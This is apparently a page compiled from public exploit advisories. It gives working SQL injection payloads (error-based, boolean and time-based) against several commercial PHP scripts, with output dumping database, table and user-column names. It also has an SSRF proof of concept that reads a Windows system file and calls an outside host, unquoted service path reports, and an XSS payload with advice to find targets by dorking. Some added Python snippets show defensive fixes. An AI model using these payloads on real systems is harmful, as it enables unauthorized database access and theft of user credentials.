<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://codecanyon.net/item/super-store-finder/3630922 │<br />│ Vendor : Super Store Finder │<br />│ Software : Super Store Finder 3.6 │<br />│ Vuln Type: SQL Injection │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │<br />│ data and crash the application or make it unavailable, leading to lost revenue and │<br />│ damage to a company's reputation. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. 
SQL, MoizSid09, indoushka <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /index.php<br /><br />---------------------------------------------------------------------------------<br />POST /products/superstorefinder/index.php HTTP/1.1<br /><br />ajax=1&action=get_nearby_stores&distance=200&lat=40.7127753&lng=-74.0059728&products=347[SQLI]<br />---------------------------------------------------------------------------------<br /><br />POST parameter 'products' is vulnerable to SQL Injection<br /><br />---<br />Parameter: products (POST)<br /> Type: error-based<br /> Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)<br /> Payload: ajax=1&action=get_nearby_stores&distance=200&lat=40.7127753&lng=-74.0059728&products=347' AND GTID_SUBSET(CONCAT_WS(0x28,0x496e6a65637465647e,0x72306f746833783439,0x7e454e44),1337)-- wXyW<br /><br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: ajax=1&action=get_nearby_stores&distance=200&lat=40.7127753&lng=-74.0059728&products=347' AND 04872=4872-- wXyW<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (IF - comment)<br /> Payload: ajax=1&action=get_nearby_stores&distance=200&lat=40.7127753&lng=-74.0059728&products=347'XOR(IF(now()=sysdate(),SLEEP(6),0))XOR'Z<br />---<br /><br /><br />[+] Starting the Attack<br /><br />fetching current database<br />current database: 'superstor_***'<br /><br /><br />fetching tables<br /><br />[8 tables]<br />+--------------+<br />| categories_b |<br />| categories |<br />| stores_c |<br />| categories_c |<br />| stores_b |<br />| users_b |<br />| users |<br />| stores |<br />+--------------+<br /><br /><br />fetching 
columns for table 'users'<br /><br />[11 columns]<br />+-------------+<br />| id |<br />| username |<br />| password |<br />| firstname |<br />| lastname |<br />| facebook_id |<br />| address |<br />| email |<br />| created |<br />| modified |<br />| status |<br />+-------------+<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code>Author : CraCkEr<br />Website : https://quickorder.by-code.com<br />Vendor : bylancer<br />Software : QuickOrder 6.3.7<br />Vuln Type: SQL Injection<br />Impact : Database Access<br /><br />© CraCkEr 2023<br /><br />Path: /blog<br /><br />https://website/blog?s=[SQLI]<br /><br /><br />GET parameter 's' is vulnerable to SQL Injection<br /><br />---<br />Parameter: s (GET)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause<br /> Payload: s=1') OR 02445=2445 OR ('04586'='4586<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (IF - comment)<br /> Payload: s=1'XOR(IF(now()=sysdate(),SLEEP(6),0))XOR'Z<br />---<br /><br /><br />[+] Starting the Attack<br /><br />fetching current database<br />current database: 'quickordercode_**'<br /><br /><br />fetching tables<br /><br />[39 tables]<br />+-------------------------+<br />| qr_orders |<br />| qr_order_items |<br />| qr_blog_comment |<br />| qr_payments |<br />| qr_menu_variants |<br />| qr_options |<br />| qr_time_zones |<br />| qr_countries |<br />| qr_restaurant |<br />| qr_blog_categories |<br />| qr_logs |<br />| qr_image_menu |<br />| qr_balance |<br />| qr_blog |<br />| qr_menu |<br />| qr_user |<br />| qr_pages |<br />| qr_menu_extras |<br />| qr_taxes |<br />| qr_upgrades |<br />| qr_usergroups |<br />| qr_faq_entries |<br />| qr_transaction |<br />| qr_restaurant_options |<br />| qr_languages |<br />| qr_admins |<br />| qr_allergies |<br />| qr_user_options |<br />| qr_order_item_extras |<br />| qr_subscriptions |<br />| qr_menu_variant_options |<br />| qr_plans |<br />| qr_testimonials |<br />| qr_plan_options |<br />| qr_catagory_main |<br />| qr_currencies |<br />| qr_restaurant_view |<br />| qr_waiter_call |<br />| qr_blog_cat_relation |<br />+-------------------------+<br /> <br /><br /><br />[-] Done<br /></code></pre>
<pre><code><br />Ateme TITAN File 3.9 Job Callbacks SSRF File Enumeration<br /><br /><br />Vendor: Ateme<br />Product web page: https://www.ateme.com<br />Affected version: 3.9.12.4<br /> 3.9.11.0<br /> 3.9.9.2<br /> 3.9.8.0<br /><br />Summary: TITAN File is a multi-codec/format video transcoding<br />software, for mezzanine, STB and ABR VOD, PostProduction, Playout<br />and Archive applications. TITAN File is based on ATEME 5th Generation<br />STREAM compression engine and delivers the highest video quality<br />at minimum bitrates with accelerated parallel processing.<br /><br />Desc: Authenticated Server-Side Request Forgery (SSRF) vulnerability<br />exists in the Titan File video transcoding software. The application<br />parses user supplied data in the job callback url GET parameter. Since<br />no validation is carried out on the parameter, an attacker can specify<br />an external domain and force the application to make an HTTP/DNS/File<br />request to an arbitrary destination. This can be used by an external<br />attacker for example to bypass firewalls and initiate a service, file<br />and network enumeration on the internal network through the affected<br />application.<br /><br />Tested on: Microsoft Windows<br /> NodeJS<br /> Ateme KFE Software<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5781<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5781.php<br /><br /><br />22.04.2023<br /><br />--<br /><br /><br />curl -vk -H "X-TITAN-WEB-HASTOKEN: true" \<br /> -H "X-TITAN-WEB-TOKEN: 54E83A8B-E9E9-9C87-886A-12CB091AB251" \<br /> -H "User-Agent: sunee-mode" \<br /> "https://10.0.0.8/cmd?data=<callback_test><url><!\[CDATA\[file://c:\\\\windows\\\\system.ini\]\]></url><state><!\[CDATA\[encoding\]\]></state></callback_test>"<br /><br />Call to file://C:\\windows\\system.ini returned 0<br /><br />---<br /><br />HTTP from Server<br />----------------<br 
/><br />POST / HTTP/1.1<br />Host: ssrftest.zeroscience.mk<br />Accept: */*<br />Content-Type: application/xml<br />Content-Length: 192<br /><br /><?xml version='1.0' encoding='UTF-8' ?><br /><update><br /> <id>0000</id><br /> <name>dummy test job</name><br /> <status>aborted</status><br /> <progress>50</progress><br /> <message>message</message><br /></update><br /></code></pre>
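<p>An added example, not part of the advisory or of the vendor's code: one way to validate a user-supplied job callback URL before the server fetches it, rejecting schemes such as file:// and any host that maps to a non-public address. The function names, the allowed schemes and the sample DNS table are assumptions made for illustration.</p>

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}   # assumption: callbacks are plain web hooks


def system_resolver(host):
    """Default resolver: every A/AAAA address the name currently maps to."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_public(addr):
    """True only for globally routable addresses (not RFC 1918, loopback, link-local)."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped            # ::ffff:10.0.0.8 is still 10.0.0.8
    return ip.is_global


def check_callback_url(url, resolve=system_resolver):
    """Return (allowed, reason, pinned_ips) for a user-supplied callback URL."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return (False, "unparseable URL", [])
    if parts.scheme not in ALLOWED_SCHEMES:
        return (False, "scheme not allowed: %r" % parts.scheme, [])
    try:
        host, _port = parts.hostname, parts.port   # .port raises on junk
    except ValueError:
        return (False, "invalid port", [])
    if not host:
        return (False, "missing host", [])
    if parts.username is not None or parts.password is not None:
        return (False, "userinfo not allowed", [])
    try:
        ipaddress.ip_address(host)
        addrs = [host]                 # literal IP, nothing to resolve
    except ValueError:
        try:
            addrs = list(resolve(host))
        except OSError:
            return (False, "host does not resolve", [])
    if not addrs:
        return (False, "host does not resolve", [])
    bad = [a for a in addrs if not is_public(a)]
    if bad:                            # one internal answer is enough to refuse
        return (False, "non-public address: " + ", ".join(bad), [])
    return (True, "ok", addrs)


# Constructed DNS answers so the example runs offline.
SAMPLE_DNS = {
    "callbacks.example.com": ["93.184.216.34"],
    "intranet.example.com": ["10.0.0.8"],
    "rebind.example.com": ["93.184.216.34", "127.0.0.1"],
}


def sample_resolver(host):
    if host not in SAMPLE_DNS:
        raise OSError("no such host: " + host)
    return SAMPLE_DNS[host]


if __name__ == "__main__":
    for candidate in (r"file://c:\\windows\\system.ini",
                      "https://10.0.0.8/cmd",
                      "https://intranet.example.com/hook",
                      "https://callbacks.example.com/job/1"):
        print(candidate, "->", check_callback_url(candidate, sample_resolver)[:2])
```

<p>The caller should connect to the returned pinned addresses instead of resolving the name a second time, and should not follow redirects, otherwise the check can be bypassed after it has passed.</p>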
<pre><code>[#] Exploit Title: Qatanna POS Software 1.0 - Blind SQL Injection<br />[#] Exploit Date: May 07, 2023.<br />[#] CVSS 3.1: 8.8 (High)<br />[#] CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H<br />[#] Application Name: Qatanna POS Software<br />[#] Application Version: 1.0<br />[#] Link: https://www.codester.com/items/42053/qatanna-pos-software<br /><br /><br />[#] Author: h4ck3r - Faisal Albuloushi<br />[#] Contact: SQL@hotmail.co.uk<br />[#] Blog: https://www.0wl.tech<br /><br /><br />[#] 3xploit:<br /><br />[path]/update_expense.php?id=[Blind-Injection]<br /><br /><br />[#] 3xample:<br /><br />[path]/update_expense.php?id=8' AND 100=100 AND 'h4ck3r'='h4ck3r<br />--> True<br />[path]/update_expense.php?id=8' AND 100=100 AND 'h4ck3r'='Faisal<br />--> False<br /><br /><br />[#] Note:<br />- This vulnerability does not need admin privileges. A normal user can exploit it.<br /></code></pre>
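<p>An added example, not code from the advisory or from the application: the True/False pair above run against a constructed SQLite table, first through a query built by string concatenation and then through a validated, bound parameter. The table layout and function names are assumptions; the application's real query is not shown on this page.</p>

```python
import sqlite3

# The two probes quoted in the advisory for the id parameter.
TRUE_PROBE = "8' AND 100=100 AND 'h4ck3r'='h4ck3r"
FALSE_PROBE = "8' AND 100=100 AND 'h4ck3r'='Faisal"


def make_db():
    """Constructed stand-in for the table behind update_expense.php."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE expenses (id INTEGER, title TEXT, amount REAL)")
    db.executemany("INSERT INTO expenses VALUES (?, ?, ?)",
                   [(8, "Printer paper", 12.5), (9, "Courier", 30.0)])
    return db


def load_expense_concat(db, raw_id):
    """'Before': the request parameter is pasted into the SQL text."""
    sql = "SELECT id, title, amount FROM expenses WHERE id = '" + raw_id + "'"
    return db.execute(sql).fetchall()


def load_expense_bound(db, raw_id):
    """'After': strict integer check, then a bound parameter."""
    if not (raw_id.isascii() and raw_id.isdigit()):
        return []                       # same answer as "no such record"
    sql = "SELECT id, title, amount FROM expenses WHERE id = ?"
    return db.execute(sql, (int(raw_id),)).fetchall()


def leaks_boolean(loader, db):
    """True when the two probes get different responses, i.e. the page
    answers an attacker-chosen yes/no question about the database."""
    return loader(db, TRUE_PROBE) != loader(db, FALSE_PROBE)


if __name__ == "__main__":
    db = make_db()
    print("concatenated query leaks:", leaks_boolean(load_expense_concat, db))
    print("bound query leaks:       ", leaks_boolean(load_expense_bound, db))
    print("legitimate id still works:", load_expense_bound(db, "8"))
```

<p>The bound parameter is what keeps the input out of the SQL grammar; the integer check only makes malformed ids fail early and uniformly.</p>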
<pre><code># Exploit Title: Game Jackal Server v5 - Unquoted Service Path<br /># Date: 06/07/2023<br /># Exploit Author: Idan Malihi<br /># Vendor Homepage: https://www.allradiosoft.ru<br /># Software Link: https://www.allradiosoft.ru/en/ss/index.htm<br /># Version: 5<br /># Tested on: Microsoft Windows 10 Pro<br /># CVE : CVE-2023-36166<br /><br />#PoC<br /><br />C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """<br />Game Jackal Server v5 GJServiceV5 C:\Program Files (x86)\SlySoft\Game Jackal v5\Server.exe Auto<br /><br />C:\Users>sc qc GJServiceV5<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: GJServiceV5<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files (x86)\SlySoft\Game Jackal v5\Server.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : Game Jackal Server v5<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br />C:\Users>systeminfo<br /><br />Host Name: DESKTOP-LA7J17P<br />OS Name: Microsoft Windows 10 Pro<br />OS Version: 10.0.19042 N/A Build 19042<br />OS Manufacturer: Microsoft Corporation<br /></code></pre>
<pre><code># Exploit Title: AVG Anti Spyware 7.5 - Unquoted Service Path<br /># Date: 06/07/2023<br /># Exploit Author: Idan Malihi<br /># Vendor Homepage: https://www.avg.com<br /># Software Link: https://www.avg.com/en-ww/homepage#pc<br /># Version: 7.5<br /># Tested on: Microsoft Windows 10 Pro<br /># CVE : CVE-2023-36167<br /><br />#PoC<br /><br />C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """<br />AVG Anti-Spyware Guard AVG Anti-Spyware Guard C:\Program Files (x86)\Grisoft\AVG Anti-Spyware 7.5\guard.exe Auto<br /><br />C:\Users>sc qc "AVG Anti-Spyware Guard"<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: AVG Anti-Spyware Guard<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files (x86)\Grisoft\AVG Anti-Spyware 7.5\guard.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : AVG Anti-Spyware Guard<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br />C:\Users>systeminfo<br /><br />Host Name: DESKTOP-LA7J17P<br />OS Name: Microsoft Windows 10 Pro<br />OS Version: 10.0.19042 N/A Build 19042<br />OS Manufacturer: Microsoft Corporation<br /></code></pre>
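<p>An added example, not part of either advisory: a Python audit of sc qc output that flags services whose BINARY_PATH_NAME is unquoted and has a space inside the executable path, and returns the quoted value to set instead. The sample output is constructed from the two listings above plus two hypothetical services, and the function names are assumptions.</p>

```python
import re

# Constructed sample: the two services from the advisories above plus two
# hypothetical services (a quoted path, and spaces only in the arguments).
SAMPLE_SC_QC = r'''
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: GJServiceV5
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\Program Files (x86)\SlySoft\Game Jackal v5\Server.exe
        SERVICE_START_NAME : LocalSystem

SERVICE_NAME: AVG Anti-Spyware Guard
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\Program Files (x86)\Grisoft\AVG Anti-Spyware 7.5\guard.exe
        SERVICE_START_NAME : LocalSystem

SERVICE_NAME: ExampleQuotedSvc
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : "C:\Program Files\Example\svc.exe" --run
        SERVICE_START_NAME : LocalSystem

SERVICE_NAME: ExampleHostedSvc
        START_TYPE         : 3   DEMAND_START
        BINARY_PATH_NAME   : C:\Windows\system32\svchost.exe -k netsvcs
        SERVICE_START_NAME : NT AUTHORITY\LocalService
'''

FIELD = re.compile(r"^\s*([A-Z_]+)\s*:\s*(.*?)\s*$")
EXE = re.compile(r"^(.*?\.exe)(?=\s|$)(.*)$", re.IGNORECASE)


def parse_sc_qc(text):
    """Split concatenated `sc qc` output into one dict of fields per service."""
    services, current = [], None
    for line in text.splitlines():
        m = FIELD.match(line)
        if not m:
            continue
        key, value = m.groups()
        if key == "SERVICE_NAME":
            current = {"SERVICE_NAME": value}
            services.append(current)
        elif current is not None:
            current[key] = value
    return services


def split_image_path(binary_path):
    """Return (executable, arguments, quoted) for a BINARY_PATH_NAME value."""
    value = binary_path.strip()
    if value.startswith('"'):
        end = value.find('"', 1)
        if end != -1:
            return value[1:end], value[end + 1:].strip(), True
    m = EXE.match(value)
    if m:
        return m.group(1), m.group(2).strip(), False
    return value, "", False   # no .exe found: treat the whole value as the path


def audit(text):
    """List services with an unquoted executable path that contains a space."""
    findings = []
    for svc in parse_sc_qc(text):
        exe, args, quoted = split_image_path(svc.get("BINARY_PATH_NAME", ""))
        if quoted or " " not in exe:
            continue              # quoted, or spaces only in the arguments
        findings.append({
            "service": svc["SERVICE_NAME"],
            "account": svc.get("SERVICE_START_NAME", ""),
            "auto_start": "AUTO_START" in svc.get("START_TYPE", ""),
            "fixed": '"%s"' % exe + (" " + args if args else ""),
        })
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_SC_QC):
        print(f["service"], "|", f["account"], "| set path to:", f["fixed"])
```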
<pre><code>Author : CraCkEr<br />Website : https://quickqr.by-code.com/<br />Vendor : Bylancer<br />Software : QuickQR 6.3.7<br />Vuln Type: SQL Injection<br />Impact : Database Access<br /><br />© CraCkEr 2023<br /><br />Path: /blog<br /><br />https://website/blog?s=[SQLI]<br /><br /><br />GET parameter 's' is vulnerable to SQL Injection<br /><br />---<br />Parameter: s (GET)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause<br /> Payload: s=123') OR 05923=5923 OR ('04586'='4586<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (IF - comment)<br /> Payload: s=123'XOR(IF(now()=sysdate(),SLEEP(6),0))XOR'Z<br />---<br /><br /><br />[+] Starting the Attack<br /><br />fetching current database<br />current database: 'quickqrmenu_**'<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code>Author : CraCkEr<br />Website : https://quickjob.bylancer.com<br />Vendor : Bylancer<br />Software : QuickJob 6.1<br />Vuln Type: SQL Injection<br />Impact : Database Access<br /><br />© CraCkEr 2023<br /><br />Path: /listing<br /><br />https://website/job-seekers?keywords=[SQLI]&location=&placetype=&placeid=&cat=&subcat=&age_range1=&age_range2=&range1=&range2=&gender=[SQLI]<br /><br /><br />GET parameter 'keywords' is vulnerable to SQL Injection<br /><br />---<br />Parameter: keywords (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: keywords=' AND 08186=8186 OR '04586'='4586&location=&placetype=&placeid=&cat=&subcat=&age_range1=&age_range2=&range1=&range2=&gender=<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (IF - comment)<br /> Payload: keywords='XOR(IF(now()=sysdate(),SLEEP(9),0))XOR'Z&location=&placetype=&placeid=&cat=&subcat=&age_range1=&age_range2=&range1=&range2=&gender=<br />---<br /><br /><br />GET parameter 'gender' is vulnerable to SQL Injection<br /><br />---<br />Parameter: gender (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: keywords=&location=&placetype=&placeid=&cat=&subcat=&age_range1=&age_range2=&range1=&range2=&gender='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z<br />---<br /><br /><br />[+] Starting the Attack<br /><br />fetching current database<br />current database: 'quickjob_**'<br /><br /><br />fetching tables<br /><br />[48 tables]<br />+---------------------------+<br />| job_logs |<br />| job_blog |<br />| job_currencies |<br />| job_user |<br />| job_emailq |<br />| job_custom_fields |<br />| job_notification |<br />| job_reviews |<br />| job_testimonials |<br />| job_user_applied |<br />| job_countries |<br />| job_product_resubmit |<br />| job_category_translation |<br />| 
job_favads |<br />| job_experiences |<br />| job_blog_categories |<br />| job_faq_entries |<br />| job_subadmin1 |<br />| job_cities |<br />| job_push_notification |<br />| job_product |<br />| job_upgrades |<br />| job_catagory_sub |<br />| job_messages |<br />| job_catagory_main |<br />| job_firebase_device_token |<br />| job_time_zones |<br />| job_blog_comment |<br />| job_custom_options |<br />| job_payments |<br />| job_adsense |<br />| job_blog_cat_relation |<br />| job_languages |<br />| job_custom_data |<br />| job_pages |<br />| job_companies |<br />| job_balance |<br />| job_login_attempts |<br />| job_subscriptions |<br />| job_fav_users |<br />| job_admins |<br />| job_resumes |<br />| job_product_type |<br />| job_salary_type |<br />| job_transaction |<br />| job_options |<br />| job_usergroups |<br />| job_subadmin2 |<br />+---------------------------+<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>Author : CraCkEr<br />Website : https://quickvcard.by-code.com/<br />Vendor : bylancer<br />Software : QuickVCard 2.1<br />Vuln Type: SQL Injection<br />Impact : Database Access<br /><br />© CraCkEr 2023<br /><br />Path: /blog<br /><br />https://website/blog?s=[SQLI]<br /><br /><br />GET parameter 's' is vulnerable to SQL Injection<br /><br />---<br />Parameter: s (GET)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause<br /> Payload: s=123') OR 02449=2449 OR ('04586'='4586<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (IF - comment)<br /> Payload: s=123'XOR(IF(now()=sysdate(),SLEEP(5),0))XOR'Z<br />---<br /><br /><br />[+] Starting the Attack<br /><br />fetching current database<br />current database: 'quickvcardcode_**'<br /><br /><br />fetching tables<br /><br />[27 tables]<br />+----------------------+<br />| vc_upgrades |<br />| vc_languages |<br />| vc_balance |<br />| vc_transaction |<br />| vc_vcard_options |<br />| vc_payments |<br />| vc_time_zones |<br />| vc_user |<br />| vc_plans |<br />| vc_user_options |<br />| vc_faq_entries |<br />| vc_admins |<br />| vc_vcards |<br />| vc_blog_cat_relation |<br />| vc_vcard_view |<br />| vc_blog_categories |<br />| vc_testimonials |<br />| vc_blog |<br />| vc_subscriber |<br />| vc_blog_comment |<br />| vc_logs |<br />| vc_countries |<br />| vc_taxes |<br />| vc_options |<br />| vc_currencies |<br />| vc_plan_options |<br />| vc_pages |<br />+----------------------+<br /><br /><br />fetching columns for Table: vc_user<br /><br />[47 columns]<br />+----------------+<br />| id |<br />| group_id |<br />| username |<br />| user_type |<br />| balance |<br />| password_hash |<br />| forgot |<br />| confirm |<br />| email |<br />| status |<br />| view |<br />| created_at |<br />| updated_at |<br />| name |<br />| tagline |<br />| description |<br />| 
dob |<br />| salary_min |<br />| salary_max |<br />| category |<br />| subcategory |<br />| website |<br />| sex |<br />| phone |<br />| postcode |<br />| address |<br />| country |<br />| city |<br />| city_code |<br />| state_code |<br />| country_code |<br />| image |<br />| lastactive |<br />| facebook |<br />| twitter |<br />| googleplus |<br />| instagram |<br />| linkedin |<br />| youtube |<br />| oauth_provider |<br />| oauth_uid |<br />| oauth_link |<br />| online |<br />| notify |<br />| notify_cat |<br />| currency |<br />| menu_layout |<br />+----------------+<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : virtual freer v1.57 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) |<br />| # Vendor : https://sourceforge.net/projects/virtualfreer/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] Use payload : /direct.php?card=19&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E<br /><br />[+] http://shopazcamultrair/direct.php?card=19&qty=1%22%3E%3Cscript%3Ealert%28/xss%20testing/%29%3C/script%3E<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>